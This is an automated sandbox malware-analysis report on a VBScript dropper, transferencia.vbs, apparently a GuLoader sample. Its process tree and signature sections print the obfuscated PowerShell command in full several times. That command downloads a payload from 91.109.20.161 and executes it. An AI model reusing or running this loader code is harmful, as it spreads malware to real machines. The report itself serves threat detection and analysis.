Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
transferencia.vbs

Overview

General Information

Sample name:transferencia.vbs
Analysis ID:1524803
MD5:c68010fc942eef8e8868e5d3197aadc8
SHA1:964fa94fcbce9a5a0499672e881b271530c7e1fa
SHA256:08b753161a621a8235016b94f3a8c68417a8907abda998f84a4de8687a515bf4
Tags:GuLoadervbsuser-abuse_ch
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
AI detected suspicious sample
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 1248 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 2448 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Preremoving monotoni afdelingslgerne Blunderers Fingredes Intwists #>;$Limpid=$host.PrivateData;If ($Limpid) {$Navicert++;}function Opbrugets52($Craftsmaster){$Postnarisnhaust=$Hellenist+$Craftsmaster.Length-$Navicert;for( $Postnaris=4;$Postnaris -lt $Postnarisnhaust;$Postnaris+=5){$Samfundslrers='nonfecund';$Informativ+=$Craftsmaster[$Postnaris];}$Informativ;}function ggepuncherne($Unpopulousness27){ & ($Topographometric) ($Unpopulousness27);}$Postnarisnertion254=Opbrugets52 'TimeMDe eo M kzVulciStillsoc l C aa Hvs/G,or5Hazi.Skak0Skun Grip(AkadWA lei C.nnUdbedOveroPreswBoilsBekj KabeNAntiTCoss Klud1Paul0,ash. Bar0Dest;A te SoftWLigniDytinEpid6.orl4Soda;P.oc VidxCer,6Sona4 nde;Unle Ra.r .rov,idg:Radi1 Med2 Moc1Brss. hon0Mode)F ey SporGMrkve FircMettkChito Tan/ Bl 2Cong0For,1 amm0Hymn0Insp1Skib0Mot,1Ring beblFFkaliHoldrLysbe.errfPicropeerxFrys/M sk1ce t2Unco1Lat . rdi0 Uds ';$billardkugle=Opbrugets52 'Mi rU TalSForhE.linrSelv- egraPediG P aeO.lyns,ggtBete ';$Ugenummer=Opbrugets52 ' An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage ';$onymize=Opbrugets52 'Plat>Awap ';$Topographometric=Opbrugets52 'BangIMa mE skuxKalk ';$nonhallucinatory='Selsparks';$Garwin='\Dorgens.Uns';ggepuncherne (Opbrugets52 'bitm$VkstgHootlsyreoInc bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest ');ggepuncherne (Opbrugets52 ' kyl$MolygIllulBetvoOri bSkina SkulOver: jerSSproaSapolO toa ecim rliaAn nnHermdskytr StiiRestnUtt eunre= T.e$.cheUFor g oneCasqnCarou,amlm ModmS.aceBrevrHo s. ompsEvalpFinnlSk.niHudktMagn(Ac,c$ TrioStkinBundy kytm UneiIn.oz Un,eGad )Armi ');ggepuncherne (Opbrugets52 'Kate[OpvuNFrfreCowstSank.EjakS BejeLicerRefivforhiinf.cBreaeA,stP .peoHabii AllnTr vtJermMHa,daTrevn fllaUtengPreaeSl,tr rdt]traw: Ci.: AsySPolleEliac aleucyrtrO,dniLet,tTel,yPersPDirrr Nono C.st.unoo Pr,cKeepoCadrlJudo Hamm=Atta Un.r[ DiaNcop eIndftMile.MammSColoeStuccMentusolbrBog,i Altt rmayAnglPContr udio attt BefoAspacArchoFredlTriaTBragyd rnpti.geM ck] rer:Rej :MuniT Taml BolsKamf1Noci2I.fl ');$Ugenummer=$Salamandrine[0];$Hexactinellid40=(Opbrugets52 'Le a$,ircGTanol jesoSperBCondA Skrlbela:CupoGOrigrGtebuuntiiHemoN onseKor =Poc,NHaece H.mWB.it-cnidOMirabultrjBaroETracCOxaltF,st s nssW.rsyNe,tsByghtMy,ieRubem s c.WaitN.uldeVaret rni.Fa iwBiseeForbbForecAub LveteISu.ee C nN BavT Dec ');ggepuncherne ($Hexactinellid40);ggepuncherne (Opbrugets52 ' S,n$FloaGBe orIntruhawkiZ.opnKonfeGirl.MohaH IsoePseuaMudcdRetseQ.adrArris inn[ Por$Fo dbFr siuklalcomplOut,a xcer .ond utukCharuPilegKos.lTo.ve.nto]Frek=,pfa$BitsPVibroLutessquatUbemnKalpa TerrAntiiFde,s Marn chieD gtrF.shtGeraiAnatoO.twnFr k2Komp5se i4 M l ');$Appartementerne=Opbrugets52 'Fdev$IndhG StorBedruUnliiFl,rn andeEpip.PaalDBengoSeiswPiannG unlskruoTo oaGlu,dlittF rii dsslRecaeStri(Mas $Inf USnevg dlneswamnpromu erdmUnstm S,jeNederdiss,Smir$EsteH andeJohaaTestdUnr wTravaPy al Va,lanaps ko ) O i ';$Headwalls=$Indkopiering;ggepuncherne (Opbrugets52 'kate$Dag,G araLEkseOGr.nBglacAF.rbLarbi:D nsSUndeANohoNMeteEsa.trBasiiBiffNRandGStums .hapCou L AceAAandnSkriSLike=Nons(OverT Pr eBesvs emotDd a-Fa.sper oaPrecTUn eh,ota Supp$Ud kh PloEEtheA Unidtragw unkAGypplGenfLNav sDann)Fecu ');while (!$Saneringsplans) {ggepuncherne (Opbrugets52 'Sati$ProcgMothlTyveo Preb ,usaHnislOdou:A orSR alopri,rEvo.t DehbEndorInt s Usmgsp cr CoroDisms S esPac.e ndrAngeeMetrrReineP,einhira=Snif$My lt JonrSammuE tue No, ') ;ggepuncherne $Appartementerne;ggepuncherne (Opbrugets52 'CuncSFrdstUdvialovbr.avtt S.i-BekoSPolylNonie UdleNapopArve Ribi4Kemi ');ggepuncherne (Opbrugets52 'a ro$MispgModslPlano dseb rka Bufl li: .ntSchina SagnSnapeGelar FreiSlgenKassgSides Filp verlTranaDok,n Slas Gla= S,a( FaaT.itueT ess olet lop-PantPb siaTorstPrush F k Pede$D,ffHSacce DisaAnild S,iwSl,vaAntilInfelPainsIm.r)Unlo ') ;ggepuncherne (Opbrugets52 ' Oc $MoelgdknilmarroUnpob BaraIn,llHark:StadIcymonRverd AntbBenvyshe.gBry nDowniSy,snKri,g v nsUnsakC ula,nclsTracs DupeRail=Form$ kilg Jorl epoo GenbTan aTromlPent:BeklORebsp laybFlledTaale ProsS at+Prsi+ Rus%Psyc$G afS Ko aJibblC.emaSvanmForna inn TriduncarAarvi Be nF lle La . recBonhoTel uK ntn.inet Con ') ;$Ugenummer=$Salamandrine[$Indbygningskasse];}$Vertikalernes=278564;$Binokular=29796;ggepuncherne (Opbrugets52 'Tung$Lkkeg SimlK tkoEnt b AdhaDis lRoni:VemoA.appbEnkesDybvt acrSan,uGasosOpkaiAntioUvrdnSkot T.l= at SkilG trae TrotRigs-OverCSp aoStadnWorktS.mmeOf in A tt Or. Ubev$ AfsHOcl.e s aaGhendEs awe spaRec lPer lKrtesA.at ');ggepuncherne (Opbrugets52 'Ind $AlkygTr clHopio DesbAlfaaM milXene:SexaPKrlir sl,oloantC leo KnarItattStonhTop,oMgl pToa.tLatee.yperd siaDisl Par = ebu Evan[Rer,S locyDeodsP rytUn ee Do.m ume.subiCInveo YaknRensvPendedeborAf mtPara]Rest:P,ak: WhiFUnrerOtheoBa,omToneBDes aJun sA emeDe,e6u pr4 retSSkoltBrisrKrokiChapnNe tgLan (Klft$ ,piATaulbStoks R.mt s vrTryku EqusPas iAktioHyponUfat) K a ');ggepuncherne (Opbrugets52 'Mine$ungrgArbelWelso Makb Ro apibelCont: ucuJFyrseUng.sKoras Pr.iJudicRin,aMiso Sag.=G ff Swoo[snotSSl.syGenks NontPreleCon,m Sp,. homTUltreSydhxDelrtTall.RadiE Astn nducUretoStdtdu jliSamdnSalggArge] Ra :Amus:FornAConuSSoulCGlggIAfhaITiss.TanyGNonreTj etUnc SEnketG eerKvkkiSermnsupegKami( Iow$MiliPpreir CafoUn htI dso DrirKapitCodhhSammoundepAdsttGryne VrarIsola Tea)S,ri ');ggepuncherne (Opbrugets52 'Fors$Fi agK lkl H.loPlebb UnsaOmr lMo.e:MameU ParnSletitalanBelljExtruRe srInt,iUdtao D.nuUnfes Bol=Torm$AsymJZeu eFinlsUkams Z.ai Sevc SupaMame. GstsVse.uPeppbtkkesZephtAmenrArali DsrnMet g Per(Mark$Ma.aVA oueD,asr ertVandi SeakArbeaUsdel F re T,krLegansc teV risTil ,Fr,e$g.ntBMajoi Fonn WoooParakDannuChlolReina,lasrGrs )Geot ');ggepuncherne $Uninjurious;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 2448JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    Other

    SourceRuleDescriptionAuthorStrings
    amsi64_2448.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: WScript or CScript Dropper
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia.vbs", ProcessId: 1248, ProcessName: wscript.exe
      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia.vbs", ProcessId: 1248, ProcessName: wscript.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Preremoving monotoni afdelingslgerne Blunderers Fingredes Intwists #>;$Limpid=$host.PrivateData;If ($Limpid) {$Navicert++;}function Opbrugets52($Craftsmaster){$Postnarisnhaust=$Hellenist+$Craftsmaster.Length-$Navicert;for( $Postnaris=4;$Postnaris -lt $Postnarisnhaust;$Postnaris+=5){$Samfundslrers='nonfecund';$Informativ+=$Craftsmaster[$Postnaris];}$Informativ;}function ggepuncherne($Unpopulousness27){ & ($Topographometric) ($Unpopulousness27);}$Postnarisnertion254=Opbrugets52 'TimeMDe eo M kzVulciStillsoc l C aa Hvs/G,or5Hazi.Skak0Skun Grip(AkadWA lei C.nnUdbedOveroPreswBoilsBekj KabeNAntiTCoss Klud1Paul0,ash. Bar0Dest;A te SoftWLigniDytinEpid6.orl4Soda;P.oc VidxCer,6Sona4 nde;Unle Ra.r .rov,idg:Radi1 Med2 Moc1Brss. hon0Mode)F ey SporGMrkve FircMettkChito Tan/ Bl 2Cong0For,1 amm0Hymn0Insp1Skib0Mot,1Ring beblFFkaliHoldrLysbe.errfPicropeerxFrys/M sk1ce t2Unco1Lat . rdi0 Uds ';$billardkugle=Opbrugets52 'Mi rU TalSForhE.linrSelv- egraPediG P aeO.lyns,ggtBete ';$Ugenummer=Opbrugets52 ' An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage ';$onymize=Opbrugets52 'Plat>Awap ';$Topographometric=Opbrugets52 'BangIMa mE skuxKalk ';$nonhallucinatory='Selsparks';$Garwin='\Dorgens.Uns';ggepuncherne (Opbrugets52 'bitm$VkstgHootlsyreoInc bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest ');ggepuncherne (Opbrugets52 ' kyl$MolygIllulBetvoOri bSkina SkulOver: jerSSproaSapolO toa ecim rliaAn nnHermdskytr StiiRestnUtt eunre= T.e$.cheUFor g oneCasqnCarou,amlm ModmS.aceBrevrHo s. ompsEvalpFinnlSk.niHudktMagn(Ac,c$ TrioStkinBundy kytm UneiIn.oz Un,eGad )Armi ');ggepuncherne (Opbrugets52 'Kate[OpvuNFrfreCowstSank.EjakS BejeLicerRefivforhiinf.cBreaeA,stP .peoHabii AllnTr vtJermMHa,daTrevn fllaUtengPreaeSl,tr rdt]traw: Ci.: AsySPolleEliac aleucyrtrO,dniLet,tTel,yPersPDirrr Nono C.st.unoo Pr,cKeepoCadrlJudo Hamm=Atta Un.r[ DiaNcop eIndftMile.MammSColoeStuccMentusolbrBog,i Altt rmayAnglPContr udio attt BefoAspacArchoFredlTriaTBragyd rnpti.geM ck] rer:Rej :MuniT Taml BolsKamf1Noci2I.fl ');$Ugenummer=$Salamandrine[0];$Hexactinellid40=(Opbrugets52 'Le a$,ircGTanol jesoSperBCondA Skrlbela:CupoGOrigrGtebuuntiiHemoN onseKor =Poc,NHaece H.mWB.it-cnidOMirabultrjBaroETracCOxaltF,st s nssW.rsyNe,tsByghtMy,ieRubem s c.WaitN.uldeVaret rni.Fa iwBiseeForbbForecAub LveteISu.ee C nN BavT Dec ');ggepuncherne ($Hexactinellid40);ggepuncherne (Opbrugets52 ' S,n$FloaGBe orIntruhawkiZ.opnKonfeGirl.MohaH IsoePseuaMudcdRetseQ.adrArris inn[ Por$Fo dbFr siuklalcomplOut,a xcer .ond utukCharuPilegKos.lTo.ve.nto]Frek=,pfa$BitsPVibroLutessquatUbemnKalpa TerrAntiiFde,

      Suricata Signatures

      No Suricata rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: transferencia.vbsVirustotal: Detection: 14%Perma Link
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.6% probability
      Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: powershell.exe, 00000002.00000002.3349546170.000001BF32E94000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.2053986258.0000021294821000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2045877123.0000021294621000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000002.00000002.3349546170.000001BF32E94000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 00000002.00000002.3349546170.000001BF32E29000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdblz[ source: powershell.exe, 00000002.00000002.3350719704.000001BF33118000.00000004.00000020.00020000.00000000.sdmp

      Software Vulnerabilities

      barindex
      Suspicious execution chain found
      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: global trafficHTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1Host: 91.109.20.161Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1Host: 91.109.20.161Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1Host: 91.109.20.161Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1Host: 91.109.20.161Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 91.109.20.161Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 91.109.20.161Connection: Keep-Alive
      Source: unknownTCP traffic detected without corresponding DNS query: 91.109.20.161
      Source: unknownTCP traffic detected without corresponding DNS query: 91.109.20.161
      Source: unknownTCP traffic detected without corresponding DNS query: 91.109.20.161
      Source: unknownTCP traffic detected without corresponding DNS query: 91.109.20.161
      Source: unknownTCP traffic detected without corresponding DNS query: 91.109.20.161
      Source: unknownTCP traffic detected without corresponding DNS query: 91.109.20.161
      Source: unknownTCP traffic detected without corresponding DNS query: 91.109.20.161
      Source: unknownTCP traffic detected without corresponding DNS query: 91.109.20.161
      Source: unknownTCP traffic detected without corresponding DNS query: 91.109.20.161
      Source: unknownTCP traffic detected without corresponding DNS query: 91.109.20.161
      Source: unknownTCP traffic detected without corresponding DNS query: 91.109.20.161
      Source: unknownTCP traffic detected without corresponding DNS query: 91.109.20.161
      Source: unknownTCP traffic detected without corresponding DNS query: 91.109.20.161
      Source: unknownTCP traffic detected without corresponding DNS query: 91.109.20.161
      Source: unknownTCP traffic detected without corresponding DNS query: 91.109.20.161
      Source: unknownTCP traffic detected without corresponding DNS query: 91.109.20.161
      Source: unknownTCP traffic detected without corresponding DNS query: 91.109.20.161
      Source: unknownTCP traffic detected without corresponding DNS query: 91.109.20.161
      Source: unknownTCP traffic detected without corresponding DNS query: 91.109.20.161
      Source: unknownTCP traffic detected without corresponding DNS query: 91.109.20.161
      Source: unknownTCP traffic detected without corresponding DNS query: 91.109.20.161
      Source: unknownTCP traffic detected without corresponding DNS query: 91.109.20.161
      Source: unknownTCP traffic detected without corresponding DNS query: 91.109.20.161
      Source: unknownTCP traffic detected without corresponding DNS query: 91.109.20.161
      Source: unknownTCP traffic detected without corresponding DNS query: 91.109.20.161
      Source: unknownTCP traffic detected without corresponding DNS query: 91.109.20.161
      Source: unknownTCP traffic detected without corresponding DNS query: 91.109.20.161
      Source: unknownTCP traffic detected without corresponding DNS query: 91.109.20.161
      Source: global trafficHTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 91.109.20.161Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 91.109.20.161Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1Host: 91.109.20.161Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1Host: 91.109.20.161Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1Host: 91.109.20.161Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1Host: 91.109.20.161Connection: Keep-Alive
      Source: powershell.exe, 00000002.00000002.3327025092.000001BF1CA44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3327025092.000001BF1C6D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3327025092.000001BF1C628000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.109.20.161
      Source: powershell.exe, 00000002.00000002.3327025092.000001BF1CA44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3327025092.000001BF1C6EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.109.20.161(
      Source: powershell.exe, 00000002.00000002.3327025092.000001BF1ACB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.109.20.161/Hestebremsen.chmP
      Source: powershell.exe, 00000002.00000002.3346421331.000001BF2AC33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000002.00000002.3327025092.000001BF1ACB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000002.00000002.3327025092.000001BF1AA81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000002.3327025092.000001BF1ACB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000002.00000002.3327025092.000001BF1AA81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000002.00000002.3327025092.000001BF1ACB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000002.00000002.3327025092.000001BF1B878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 00000002.00000002.3346421331.000001BF2AC33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

      System Summary

      barindex
      Windows Scripting host queries suspicious COM object (likely to drop second stage)
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
      Wscript starts Powershell (via cmd or directly)
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Preremoving monotoni afdelingslgerne Blunderers Fingredes Intwists #>;$Limpid=$host.PrivateData;If ($Limpid) {$Navicert++;}function Opbrugets52($Craftsmaster){$Postnarisnhaust=$Hellenist+$Craftsmaster.Length-$Navicert;for( $Postnaris=4;$Postnaris -lt $Postnarisnhaust;$Postnaris+=5){$Samfundslrers='nonfecund';$Informativ+=$Craftsmaster[$Postnaris];}$Informativ;}function ggepuncherne($Unpopulousness27){ & ($Topographometric) ($Unpopulousness27);}$Postnarisnertion254=Opbrugets52 'TimeMDe eo M kzVulciStillsoc l C aa Hvs/G,or5Hazi.Skak0Skun Grip(AkadWA lei C.nnUdbedOveroPreswBoilsBekj KabeNAntiTCoss Klud1Paul0,ash. Bar0Dest;A te SoftWLigniDytinEpid6.orl4Soda;P.oc VidxCer,6Sona4 nde;Unle Ra.r .rov,idg:Radi1 Med2 Moc1Brss. hon0Mode)F ey SporGMrkve FircMettkChito Tan/ Bl 2Cong0For,1 amm0Hymn0Insp1Skib0Mot,1Ring beblFFkaliHoldrLysbe.errfPicropeerxFrys/M sk1ce t2Unco1Lat . rdi0 Uds ';$billardkugle=Opbrugets52 'Mi rU TalSForhE.linrSelv- egraPediG P aeO.lyns,ggtBete ';$Ugenummer=Opbrugets52 ' An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage ';$onymize=Opbrugets52 'Plat>Awap ';$Topographometric=Opbrugets52 'BangIMa mE skuxKalk ';$nonhallucinatory='Selsparks';$Garwin='\Dorgens.Uns';ggepuncherne (Opbrugets52 'bitm$VkstgHootlsyreoInc bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest ');ggepuncherne (Opbrugets52 ' kyl$MolygIllulBetvoOri bSkina SkulOver: jerSSproaSapolO toa ecim rliaAn nnHermdskytr StiiRestnUtt eunre= T.e$.cheUFor g oneCasqnCarou,amlm ModmS.aceBrevrHo s. ompsEvalpFinnlSk.niHudktMagn(Ac,c$ TrioStkinBundy kytm UneiIn.oz Un,eGad )Armi ');ggepuncherne (Opbrugets52 'Kate[OpvuNFrfreCowstSank.EjakS BejeLicerRefivforhiinf.cBreaeA,stP .peoHabii AllnTr vtJermMHa,daTrevn fllaUtengPreaeSl,tr rdt]traw: Ci.: AsySPolleEliac aleucyrtrO,dniLet,tTel,yPersPDirrr Nono C.st.unoo Pr,cKeepoCadrlJudo Hamm=Atta Un.r[ DiaNcop eIndftMile.MammSColoeStuccMentusolbrBog,i Altt rmayAnglPContr udio attt BefoAspacArchoFredlTriaTBragyd rnpti.geM ck] rer:Rej :MuniT Taml BolsKamf1Noci2I.fl ');$Ugenummer=$Salamandrine[0];$Hexactinellid40=(Opbrugets52 'Le a$,ircGTanol jesoSperBCondA Skrlbela:CupoGOrigrGtebuuntiiHemoN onseKor =Poc,NHaece H.mWB.it-cnidOMirabultrjBaroETracCOxaltF,st s nssW.rsyNe,tsByghtMy,ieRubem s c.WaitN.uldeVaret rni.Fa iwBiseeForbbForecAub LveteISu.ee C nN BavT Dec ');ggepuncherne ($Hexactinellid40);ggepuncherne (Opbrugets52 ' S,n$FloaGBe orIntruhawkiZ.opnKonfeGirl.MohaH IsoePseuaMudcdRetseQ.adrArris inn[ Por$Fo dbFr siuklalcomplOut,a xcer .ond utukCharuPilegKos.lTo.ve.nto]Frek=
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Preremoving monotoni afdelingslgerne Blunderers Fingredes Intwists #>;$Limpid=$host.PrivateData;If ($Limpid) {$Navicert++;}function Opbrugets52($Craftsmaster){$Postnarisnhaust=$Hellenist+$Craftsmaster.Length-$Navicert;for( $Postnaris=4;$Postnaris -lt $Postnarisnhaust;$Postnaris+=5){$Samfundslrers='nonfecund';$Informativ+=$Craftsmaster[$Postnaris];}$Informativ;}function ggepuncherne($Unpopulousness27){ & ($Topographometric) ($Unpopulousness27);}$Postnarisnertion254=Opbrugets52 'TimeMDe eo M kzVulciStillsoc l C aa Hvs/G,or5Hazi.Skak0Skun Grip(AkadWA lei C.nnUdbedOveroPreswBoilsBekj KabeNAntiTCoss Klud1Paul0,ash. Bar0Dest;A te SoftWLigniDytinEpid6.orl4Soda;P.oc VidxCer,6Sona4 nde;Unle Ra.r .rov,idg:Radi1 Med2 Moc1Brss. hon0Mode)F ey SporGMrkve FircMettkChito Tan/ Bl 2Cong0For,1 amm0Hymn0Insp1Skib0Mot,1Ring beblFFkaliHoldrLysbe.errfPicropeerxFrys/M sk1ce t2Unco1Lat . rdi0 Uds ';$billardkugle=Opbrugets52 'Mi rU TalSForhE.linrSelv- egraPediG P 